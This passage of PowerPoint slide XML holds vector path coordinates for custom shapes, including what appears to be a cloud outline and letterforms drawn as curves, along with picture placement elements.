                    <a:pt x="337032" y="193805"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333645" y="217399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333645" y="247734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323483" y="249419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311628" y="251104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301466" y="254475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289611" y="257845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281143" y="262901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="270981" y="269642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="262513" y="274698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235414" y="308403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221865" y="348850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220172" y="362332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221865" y="369073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221865" y="379185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210010" y="375814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196461" y="372444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182912" y="370758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171056" y="370758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152426" y="372444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103311" y="384241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60970" y="407834"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28791" y="441540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6774" y="483671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="514006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="547711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11855" y="593214"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37259" y="631975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74519" y="662310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88068" y="672421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103311" y="677477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118554" y="684218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135490" y="687589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152426" y="689274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171056" y="690959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="181218" y="690959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193074" y="689274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193074" y="704441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194767" y="714553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194767" y="724665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198155" y="734776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199848" y="743203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206623" y="763426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211704" y="771852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216784" y="781964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242189" y="815669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="282836" y="851060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321790" y="872968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365824" y="888136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="403084" y="894877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="414939" y="896562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="426795" y="896562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440344" y="898247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="453893" y="896562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="467442" y="896562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="494540" y="893191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="508089" y="889821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="531800" y="883080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="545349" y="879709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="555511" y="874653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567366" y="867912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="577528" y="862857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="587690" y="856116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599545" y="849374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="608014" y="842633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="618175" y="835892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="626644" y="827466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="633418" y="835892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="641886" y="846004"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="650354" y="852745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="660516" y="861171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="670678" y="867912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="680840" y="876339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="692695" y="881395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="706244" y="888136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="719793" y="893191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733342" y="896562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="748585" y="901618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="779070" y="908359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="794313" y="910044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="809556" y="910044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826492" y="911729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="868833" y="908359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="909480" y="899932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="960289" y="881395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1002630" y="852745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1014485" y="842633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1038196" y="807243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1046664" y="780278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1055133" y="781964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1061907" y="783649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1090699" y="783649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1100861" y="781964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1112716" y="780278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1122878" y="776908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1133040" y="771852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1149976" y="761741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1156751" y="753314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1165219" y="746573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1171993" y="739832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1177074" y="731406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1180461" y="721294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1185542" y="712868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1188930" y="702756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1190623" y="692645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1190623" y="682533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1188930" y="669051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1187236" y="657254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1199091" y="658939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1212640" y="660624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1224496" y="662310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1238045" y="662310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1293935" y="653883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1343050" y="633660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1393859" y="589843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1402327" y="574676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1410795" y="561194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1417570" y="546026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1424344" y="512321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1426038" y="495468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1424344" y="478616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1410795" y="431428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1382004" y="389296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1343050" y="358962"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1327807" y="348850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1310871" y="342109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1293935" y="337053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1275305" y="331997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1238045" y="328627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1226189" y="330312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1214334" y="330312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1202479" y="331997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1190623" y="335368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1190623" y="291551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1188930" y="278069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1187236" y="266272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1183849" y="254475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1180461" y="244363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1177074" y="232566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1166912" y="208973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1156751" y="188750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1149976" y="178638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1143201" y="170212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1136427" y="160100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1127959" y="151674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1121184" y="143247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1112716" y="134821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1104248" y="128080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1095780" y="119654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1075456" y="106171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1033115" y="85948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="963676" y="70781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="951821" y="70781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="929804" y="72466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="909480" y="74151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="889157" y="80892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="868833" y="85948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="831573" y="102801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="816330" y="114598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="799394" y="126395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="782458" y="99430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="772296" y="87633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="762134" y="74151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="738423" y="53928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="724874" y="43816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="709632" y="33705"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694389" y="26964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="680840" y="20223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="663903" y="13482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="648661" y="8426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="631724" y="3370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="597852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6" name="object 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D467062-9EAB-3BE8-0C6E-C5A8E5B19C4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68553" y="2674841"/>
              <a:ext cx="1343050" cy="837578"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="27" name="object 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B83BA902-D724-7D26-C680-5DF2261077B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24519" y="2643903"/>
              <a:ext cx="1446285" cy="930909"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="object 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40E50DEF-C157-EBAC-0010-F471AF01D7AB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7166635" y="2413825"/>
              <a:ext cx="990600" cy="311150"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="990600" h="311150">
                  <a:moveTo>
                    <a:pt x="990269" y="194894"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="971791" y="139839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="910424" y="88519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="866254" y="65595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="814451" y="45212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="756081" y="27901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="692162" y="14211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="623722" y="4686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="554786" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="489432" y="317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428752" y="5295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="373888" y="14643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325970" y="28041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286092" y="45173"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235026" y="89369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226072" y="115824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229438" y="143535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239776" y="162242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="201561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130162" y="259105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317766" y="228358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="350100" y="245122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="401891" y="265506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="460273" y="282803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="524192" y="296494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="592620" y="306031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="661555" y="310705"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="726922" y="310400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="787603" y="305409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="842467" y="296062"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="890384" y="282663"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="930249" y="265544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="981316" y="221335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="990269" y="194894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9" name="object 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFB88E82-962E-3DA8-276D-BE46F12F093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39323" y="1978044"/>
              <a:ext cx="251861" cy="88006"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="object 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B60D3B74-CEC5-FB89-4C17-8C6626E130D8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7731294" y="1899768"/>
              <a:ext cx="269875" cy="238760"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="269875" h="238760">
                  <a:moveTo>
                    <a:pt x="0" y="238634"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="269608" y="190400"/>
                  </a:lnTo>
                </a:path>
                <a:path w="269875" h="238760">
                  <a:moveTo>
                    <a:pt x="0" y="48234"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="269608" y="0"/>
                  </a:lnTo>
                </a:path>
                <a:path w="269875" h="238760">
                  <a:moveTo>
                    <a:pt x="5071" y="45695"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5071" y="238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1" name="object 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C052B998-7CF2-033B-0956-B7549A47663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65876" y="1613186"/>
              <a:ext cx="895162" cy="1064260"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="object 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63D3EEC4-40BF-906F-0C29-251D7C532BC4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7279132" y="2729141"/>
              <a:ext cx="789305" cy="279400"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="789304" h="279400">
                  <a:moveTo>
                    <a:pt x="89344" y="4508"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="70802" y="4508"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44932" y="60350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24841" y="18376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18199" y="4508"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4508"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="104787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12471" y="104787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12471" y="18376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40144" y="77165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48107" y="77165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56083" y="60350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75984" y="18376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75984" y="104787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89344" y="104787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89344" y="18376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89344" y="4508"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="789304" h="279400">
                  <a:moveTo>
                    <a:pt x="175577" y="211759"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="161696" y="182016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161696" y="204216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161696" y="210616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139928" y="228536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123304" y="228536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123304" y="188468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140728" y="188468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159867" y="198640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161086" y="201193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161696" y="204216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161696" y="182016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160350" y="181114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156654" y="179539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148297" y="177507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143205" y="177012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109956" y="177012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109956" y="277291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123304" y="277291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123304" y="239903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143840" y="239903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149771" y="239052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159219" y="235597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163296" y="233006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167754" y="228536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169532" y="226758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171716" y="223469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174802" y="215887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175577" y="211759"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="789304" h="279400">
                  <a:moveTo>
                    <a:pt x="177241" y="48895"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="176491" y="44831"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174040" y="39370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173913" y="39103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173837" y="38925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149796" y="27736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139954" y="27736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134848" y="28194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135089" y="28194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126022" y="29768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122453" y="30518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119976" y="31191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119976" y="44107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120472" y="44107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125006" y="42367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129247" y="41109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137401" y="39370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141109" y="38925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147180" y="38925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163118" y="45999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164134" y="47879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164630" y="50266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164630" y="55092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164630" y="65328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164630" y="86271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161493" y="88684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158089" y="90766"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150710" y="94234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146659" y="95097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136867" y="95097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132892" y="94005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127685" y="89636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126377" y="86410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126377" y="78270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164630" y="65328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164630" y="55092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122923" y="62826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113322" y="77254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113322" y="89928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115658" y="95656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125095" y="104635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130848" y="106883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141312" y="106883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144538" y="106527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149999" y="105130"/>
                  </a:lnTo>
